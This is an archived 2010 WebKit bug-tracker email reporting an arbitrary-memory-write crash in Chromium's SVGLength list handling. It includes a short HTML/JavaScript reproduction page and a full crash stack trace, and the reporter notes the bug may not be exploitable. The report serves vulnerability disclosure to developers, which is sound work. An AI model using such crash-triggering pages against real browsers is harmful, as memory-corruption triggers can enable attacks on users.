[Webkit-unassigned] [Bug 48831] New: chrome.dll!WebCore::SVGLength::SVGLength WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Tue Nov 2 06:21:04 PDT 2010 

https://bugs.webkit.org/show_bug.cgi?id=48831

           Summary: chrome.dll!WebCore::SVGLength::SVGLength
                    WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
               URL: http://code.google.com/p/chromium/issues/detail?id=615
                    76
        OS/Version: Windows Vista
            Status: NEW
          Severity: Normal
          Priority: P1
         Component: SVG
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org, zimmermann at kde.org,
                    mdelaney at apple.com


Created an attachment (id=72656)
 --> (https://bugs.webkit.org/attachment.cgi?id=72656&action=review)
Repro

Repro:
<html><head><script>
  function go() {
    var oSVGAltGlyphElement = window.document.createElementNS("http://www.w3.org/2000/svg", "altGlyph");
    var oSvgMaskElement = document.createElementNS("http://www.w3.org/2000/svg","mask");
    var oSvgLengthList = oSVGAltGlyphElement.dy.baseVal;
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    oSvgLengthList.removeItem(0);
    gc();
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    location.reload();
  }
</script></head><body onload="go();"></body></html>

May not be exploitable; my fuzzer found a number of read and write AVs while trying to reduce the issue but they were mostly NULL pointers, except for the ReadAV below. It's not immediately obvious to me what is causing this.

id:             chrome.dll!WebCore::SVGLength::SVGLength WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)
description:    Security: Attempt to write to arbitrary memory @ 0x00D60000 in chrome.dll!WebCore::SVGLength::SVGLength
note:           Based on this information, this is expected to be a security issue!
application:    Chromium 9.0.571.0
stack:          chrome.dll!WebCore::SVGLength::SVGLength
                chrome.dll!WTF::VectorCopier<...>::uninitializedCopy
                chrome.dll!WTF::VectorMover<...>::moveOverlapping
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGAnimatedListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::appendItem
                chrome.dll!WebCore::SVGLengthListInternal::appendItemCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                chrome.dll!v8::Function::Call
                chrome.dll!WebCore::V8Proxy::callFunction
                chrome.dll!WebCore::V8LazyEventListener::callListenerFunction
                chrome.dll!WebCore::V8AbstractEventListener::invokeEventHandler
                chrome.dll!WebCore::V8AbstractEventListener::handleEvent
                chrome.dll!WebCore::EventTarget::fireEventListeners
                chrome.dll!WebCore::EventTarget::fireEventListeners
                chrome.dll!WebCore::DOMWindow::dispatchEvent
                chrome.dll!WebCore::DOMWindow::dispatchLoadEvent
                chrome.dll!WebCore::Document::implicitClose
                chrome.dll!WebCore::FrameLoader::checkCompleted
                chrome.dll!WebCore::FrameLoader::finishedParsing
                chrome.dll!WebCore::Document::finishedParsing
                chrome.dll!WebCore::HTMLDocumentParser::prepareToStopParsing
                chrome.dll!WebCore::DocumentWriter::endIfNotLoadingMainResource
                chrome.dll!WebCore::FrameLoader::finishedLoading
                chrome.dll!WebCore::MainResourceLoader::didFinishLoading
                chrome.dll!WebCore::ResourceLoader::didFinishLoading
                chrome.dll!WebCore::ResourceHandleInternal::didFinishLoading
                chrome.dll!webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest
                chrome.dll!ResourceDispatcher::OnRequestComplete
                chrome.dll!IPC::MessageWithTuple<...>::Dispatch<ResourceDispatcher,void 
                chrome.dll!ResourceDispatcher::DispatchMessageW
                chrome.dll!ResourceDispatcher::OnMessageReceived
                chrome.dll!ChildThread::OnMessageReceived
                chrome.dll!RunnableMethod<...>,void 
                chrome.dll!MessageLoop::RunTask
                chrome.dll!MessageLoop::DoWork
                chrome.dll!base::MessagePumpDefault::Run
                chrome.dll!MessageLoop::RunInternal
                chrome.dll!MessageLoop::Run
                chrome.dll!RendererMain
                ...

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list